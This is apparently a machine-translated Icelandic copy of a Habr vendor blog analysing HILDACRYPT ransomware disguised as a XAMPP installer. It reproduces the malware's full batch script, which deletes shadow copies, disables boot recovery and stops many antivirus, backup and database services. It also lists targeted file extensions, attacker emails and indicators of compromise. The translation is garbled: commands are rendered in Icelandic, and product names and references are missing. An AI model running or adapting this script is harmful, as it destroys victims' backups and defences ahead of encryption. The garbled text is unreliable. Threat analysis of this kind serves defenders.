Halló, Habr! Enn og aftur erum við að tala um nýjustu útgáfur af spilliforritum úr flokki Ransomware. HILDACRYPT er nýr lausnarhugbúnaður, meðlimur Hildu fjölskyldunnar sem uppgötvaðist í ágúst 2019, nefndur eftir Netflix teiknimyndinni sem var notuð til að dreifa hugbúnaðinum. Í dag erum við að kynnast tæknilegum eiginleikum þessa uppfærða lausnarhugbúnaðar vírus.
Í fyrstu útgáfunni af Hilda lausnarhugbúnaði, tengill á einn sem settur var á Youtube teiknimyndasería var að finna í lausnargjaldsbréfinu. HILDACRYPT dular sig sem lögmætt XAMPP uppsetningarforrit, Apache dreifing sem auðvelt er að setja upp sem inniheldur MariaDB, PHP og Perl. Á sama tíma hefur cryptolocker annað skráarnafn - xamp. Að auki hefur lausnarhugbúnaðarskráin ekki rafræna undirskrift.
Statísk greining
Ransomware-forritið er í PE32 .NET skrá sem er skrifuð fyrir MS. WindowsStærð þess er 135.168 bæti. Bæði aðalforritakóðinn og varnarkóðinn eru skrifaðir í C#. Samkvæmt dagsetningu og tímastimpli samantektarinnar var tvíundarskráin búin til 14. september 2019.
Samkvæmt Detect It Easy er lausnarhugbúnaðurinn geymdur í geymslu með Confuser og ConfuserEx, en þessir obfuscators eru þeir sömu og áður, aðeins ConfuserEx er arftaki Confuser, svo undirskriftir kóða þeirra eru svipaðar.
HILDACRYPT er örugglega pakkað með ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Árásarvektor
Líklega var lausnarhugbúnaðurinn uppgötvaður á einni af forritunarsíðunum á vefnum, sem duldist sem lögmætt XAMPP forrit.
Hægt er að sjá alla sýkingarkeðjuna í .
Skýring
Ransomware strengirnir eru geymdir á dulkóðuðu formi. Þegar það er hleypt af stokkunum afkóðar HILDACRYPT þau með Base64 og AES-256-CBC.
Uppsetning
Fyrst af öllu býr lausnarhugbúnaðurinn til möppu í %AppDataRoaming% þar sem GUID (Globally Unique Identifier) færibreytan er mynduð af handahófi. Með því að bæta kylfu-skrá við þennan stað, ræsir lausnarhugbúnaðarvírusinn hana með cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & hætta
Það byrjar síðan að keyra hópforskrift til að slökkva á kerfiseiginleikum eða þjónustu.
Handritið inniheldur langan lista af skipunum sem eyðileggja skuggaafrit, slökkva á SQL þjóninum, öryggisafrit og vírusvarnarlausnir.
Til dæmis reynir það án árangurs að stöðva Acronis Backup þjónustu. Að auki ræðst það á afritunarkerfi og vírusvarnarlausnir frá eftirfarandi söluaðilum: Veeam, Sophos, Kaspersky, McAfee og fleirum.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Þegar búið er að slökkva á þjónustunni og ferlunum sem nefnd eru hér að ofan safnar dulritunarstjórinn upplýsingum um öll ferli sem eru í gangi með því að nota tasklist skipunina til að tryggja að öll nauðsynleg þjónusta sé niðri.
verkefnalisti v/fo csv
Þessi skipun sýnir ítarlegan lista yfir ferla í gangi, en þættir þeirra eru aðskildir með „,“ tákninu.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Eftir þessa athugun byrjar lausnarhugbúnaðurinn dulkóðunarferlið.
Dulkóðun
Skrá dulkóðun
HILDACRYPT fer í gegnum allt fundinn innihald harða diska, nema Recycle.Bin og Reference Assemblies Microsoft möppurnar. Hið síðarnefnda inniheldur mikilvægar dll-, pdb- o.s.frv. skrár fyrir .Net forrit sem geta haft áhrif á virkni lausnarhugbúnaðarins. Til að leita að skrám sem verða dulkóðaðar er eftirfarandi listi yfir viðbætur notaður:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Lausnarhugbúnaðurinn notar AES-256-CBC reikniritið til að dulkóða notendaskrár. Lyklastærðin er 256 bitar og upphafsvigur (IV) stærð er 16 bæti.
Í eftirfarandi skjámynd voru gildi byte_2 og byte_1 fengin af handahófi með því að nota GetBytes().
Lykill
Í OG
Dulkóðaða skráin hefur endinguna HCY!.. Þetta er dæmi um dulkóðaða skrá. Lykillinn og IV sem nefnd eru hér að ofan voru búin til fyrir þessa skrá.
Dulkóðun lykla
Dulritunarvélin geymir myndaða AES lykilinn í dulkóðaðri skrá. Fyrsti hluti dulkóðuðu skrárinnar er með haus sem inniheldur gögn eins og HILDACRYPT, KEY, IV, FileLen á XML sniði og lítur svona út:
AES og IV lykla dulkóðun er gerð með RSA-2048 og kóðun er gerð með Base64. RSA opinberi lykillinn er geymdur í meginmáli dulritunarvélarinnar í einum af dulkóðuðu strengjunum á XML sniði.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA opinber lykill er notaður til að dulkóða AES skráarlykilinn. RSA almenningslykillinn er Base64 kóðaður og samanstendur af stuðuli og opinberum veldisvísi 65537. Afkóðun krefst RSA einkalykilsins, sem árásarmaðurinn hefur.
Eftir RSA dulkóðun er AES lykillinn dulkóðaður með Base64 sem er geymdur í dulkóðuðu skránni.
Lausnargjaldsskilaboð
Þegar dulkóðun er lokið skrifar HILDACRYPT html skrána í möppuna þar sem það dulkóðaði skrárnar. Tilkynningin um lausnarhugbúnað inniheldur tvö netföng þar sem fórnarlambið getur haft samband við árásarmanninn.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
Tilkynningin um fjárkúgun inniheldur einnig línuna „No loli is safe;)“ - tilvísun í anime og manga persónur með útliti lítilla stúlkna sem eru bannaðar í Japan.
Output
HILDACRYPT, ný lausnarhugbúnaðarfjölskylda, hefur gefið út nýja útgáfu. Dulkóðunarlíkanið kemur í veg fyrir að fórnarlambið afkóði skrár sem dulkóðaðar eru af lausnarhugbúnaðinum. Cryptolocker notar virkar verndaraðferðir til að slökkva á verndarþjónustu sem tengist öryggisafritunarkerfum og vírusvarnarlausnum. Höfundur HILDACRYPT er aðdáandi teiknimyndaþáttarins Hilda sem sýndur er á Netflix, en hlekkurinn á stikluna hennar var að finna í kaupbréfi fyrri útgáfu forritsins.
Venjulega, и getur verndað tölvuna þína gegn HILDACRYPT lausnarhugbúnaði og veitendur hafa getu til að vernda viðskiptavini sína með . Vernd er tryggð með því að þessar lausnir fela í sér inniheldur ekki aðeins öryggisafrit, heldur einnig samþætt öryggiskerfi okkar - Knúið af vélanámslíkani og byggt á atferlisheuristics, tækni sem er fær um að vinna gegn ógninni af núll-daga lausnarhugbúnaði eins og enginn annar.
Vísbendingar um málamiðlun
Skráarending HCY!
HILDACRYPTReadMe.html
xamp.exe með einum staf „p“ og engin stafræn undirskrift
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Heimild: www.habr.com
